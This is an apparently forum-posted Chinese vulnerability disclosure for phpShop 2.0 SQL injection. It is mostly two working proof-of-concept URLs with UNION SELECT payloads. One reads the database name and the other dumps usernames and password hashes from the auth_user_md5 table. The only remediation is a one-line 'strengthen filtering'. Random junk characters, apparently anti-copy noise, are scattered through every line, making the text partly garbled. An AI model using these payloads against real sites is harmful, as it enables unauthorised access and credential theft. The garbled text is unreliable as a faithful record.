标题 : phpshop 2.0 SQL Injection Vulnerability5 S2 k- M; p# W6 E1 {* q
5 d' D) Z$ D8 y5 H2 a) k作者 : By onestree
. a( B: H; D- n$ K6 v下载地址 : http://code.google.com/p/phpshop/downloads/list
5 n9 X% B/ p7 j. \4 E测试地址: windows 7 / ubuntu+ t0 S9 Y: p/ v' S9 O
5 Z. ^' N: b9 l2 H9 s7 O* [
' t: k4 B+ Z; j' T" z7 y
SQLi p0c:
4 r) E8 R$ V. b. Y% }! L# \6 }% ? 4 F5 }! h9 Q0 s7 ]2 L
==================6 w2 H/ R0 t* w7 o9 t2 B9 s% F2 H7 X
7 U7 k% Q% ^/ k Y( whttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'- M# E$ a$ h7 E1 E
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
% A+ e0 Y! s9 q% k
5 O4 n. L3 W; b5 V2 Ehttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
. N/ I2 d$ y* Y1 V; `4 u: \$ B ^3 \: I/ o3 s
修复:% v3 Y9 f* z6 m4 z
加强过滤- b6 f) J, d. }" y5 F' ]2 w
% |) R: L* G4 V% e: K7 S, T6 }. l6 T5 l
|